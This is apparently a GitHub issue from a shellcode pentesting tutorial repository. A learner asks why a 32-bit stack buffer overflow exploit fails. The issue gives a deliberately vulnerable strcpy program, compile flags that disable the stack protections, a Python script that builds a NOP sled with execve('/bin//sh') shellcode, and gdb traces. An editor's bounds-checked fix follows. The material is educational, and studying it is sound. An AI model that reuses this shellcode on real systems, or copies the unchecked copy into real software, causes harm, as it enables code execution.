hamza-megahed / pentest-with-shellcode
Penetration testing with shellcode codes
Hi @Hamza-Megahed,
I was unable to reproduce https://github.com/Hamza-Megahed/pentest-with-shellcode/tree/master/7-exploit-development-part1:
```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Deliberately vulnerable: strcpy() has no bounds check, so an argv[1]
 * longer than 49 bytes runs past buffer[] into the saved EBP and EIP. */
int copy_to_buffer(char *input)
{
    char buffer[50];
    strcpy(buffer, input);
    return 0;
}

int main(int argc, char *argv[])
{
    int local_variable = 1;
    copy_to_buffer(argv[1]);
    exit(0);
}
```
```sh
# -fno-stack-protector disables the stack canary; -z execstack makes the stack executable
gcc -m32 -fno-stack-protector -z execstack buffer.c -o buffer
```
```python
#!/usr/bin/python
# Python 2 script: str values are byte strings, so the payload can be built
# by concatenating escaped bytes and written straight to the file.
import struct

jump_shellcode = struct.pack("<I", 0xffffd0fc)   # value the saved EIP is overwritten with (little-endian)
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
buffer = "\x90" * 39        # NOP sled
buffer += shellcode         # 23-byte execve("/bin//sh") shellcode
buffer += jump_shellcode    # 39 + 23 + 4 = 66 bytes in total
fp = open("3.txt", "w")
fp.write(buffer)
fp.close()
print "Done!"
```
```
(gdb) break main
Breakpoint 1 at 0x58b
(gdb) run $(cat 3.txt)
Starting program: /home/shellcodes/exploit_shellcode/buff $(cat 3.txt)
Breakpoint 1, 0x5655558b in main ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/100x $esp - 100
0xffffd0cc: 0x5655556f 0xffffd0ee 0xffffd3e1 0xffffd0fb
0xffffd0dc: 0x56555559 0x000000c2 0x00000000 0x00c30000
0xffffd0ec: 0x90900001 0x90909090 0x90909090 0x90909090
0xffffd0fc: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd10c: 0x90909090 0x90909090 0x90909090 0x50c03190
0xffffd11c: 0x732f2f68 0x622f6868 0xe3876e69 0x80cd0bb0
0xffffd12c: 0x42424242
```
You can see that EIP is overwritten,
but when I set any address, such as 0xffffd0fc, I always get a Segmentation fault error; /bin/sh does not work.
After setting EIP:
```
(gdb) run $(cat 3.txt)
Starting program: /home/shellcodes/exploit_shellcode/buff $(cat 3.txt)
Program received signal SIGSEGV, Segmentation fault.
0xffffd126 in ?? ()
(gdb) x/100x $esp - 100
0xffffd0c0: 0xffffd0fa 0x56556fd4 0xf7f9d000 0x5655556f
0xffffd0d0: 0xffffd0ee 0xffffd3e1 0xffffd0fb 0x56555559
0xffffd0e0: 0x000000c2 0x00000000 0x00c30000 0x90900001
0xffffd0f0: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd100: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd110: 0x90909090 0x90909090 0x50c03190 0x732f2f68
0xffffd120: 0x622f6868 0x6e69622f 0x68732f2f 0x00000000
0xffffd130: 0xffffd300 0x56556fd4 0x00000002 0x56555593
0xffffd140: 0x00000002 0xffffd204 0xffffd210 0x00000001
EAX: 0x0
EBX: 0xe3876e69
ECX: 0xffffd420 --> 0xffffd0
EDX: 0xffffd12d --> 0x0
ESI: 0x2
EDI: 0xf7f9d000 --> 0x1d1d70
EBP: 0x80cd0bb0
ESP: 0xffffd124 ("/bin//sh")
EIP: 0xffffd126 ("in//sh")
```
My EIP is 0xffffd126 ("in//sh").
2 bytes are missing here, why?
Thanks,
Ahmed
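The unbounded strcpy() into buffer[50] in copy_to_buffer() is the defect this issue exercises. Added here as an editor's example, not code from the issue or from the repository, is a bounds-checked replacement that rejects any input that does not fit, together with a helper (try_payload_of_length, a name assumed for this example) that feeds it constructed 'A' strings of a given length, including the 66-byte length of the payload above:

```c
#include <string.h>
#include <stdlib.h>
#include <errno.h>

/* Same size as the buffer in the original copy_to_buffer(). */
#define BUFFER_SIZE 50

/* Hardened replacement for copy_to_buffer(): the input length is checked before
 * anything is copied, so 50 bytes or more (no room left for the terminating NUL)
 * is rejected instead of running past buffer[]. Returns bytes copied or -1 with errno set. */
int copy_to_buffer_checked(const char *input)
{
    char buffer[BUFFER_SIZE];

    if (input == NULL) {
        errno = EINVAL;
        return -1;
    }
    /* memchr() scans at most sizeof buffer bytes, so even an unterminated
     * input cannot be over-read while looking for its NUL. */
    const char *nul = memchr(input, '\0', sizeof buffer);
    if (nul == NULL) {
        errno = ENAMETOOLONG;
        return -1;
    }
    size_t len = (size_t)(nul - input);
    memcpy(buffer, input, len + 1);   /* len + 1 <= sizeof buffer by the check above */
    return (int)len;
}

/* Test helper (assumed name): builds a constructed n-byte string of 'A's as a stand-in
 * for argv[1]. Returns the copied length, -1 if rejected, or -2 if malloc() fails. */
int try_payload_of_length(size_t n)
{
    char *payload = malloc(n + 1);
    if (payload == NULL)
        return -2;
    memset(payload, 'A', n);
    payload[n] = '\0';
    int rc = copy_to_buffer_checked(payload);
    free(payload);
    return rc;
}

int main(int argc, char *argv[])
{
    /* Exit non-zero instead of crashing when the argument is missing or too long. */
    if (argc < 2 || copy_to_buffer_checked(argv[1]) < 0)
        return 1;
    return 0;
}
```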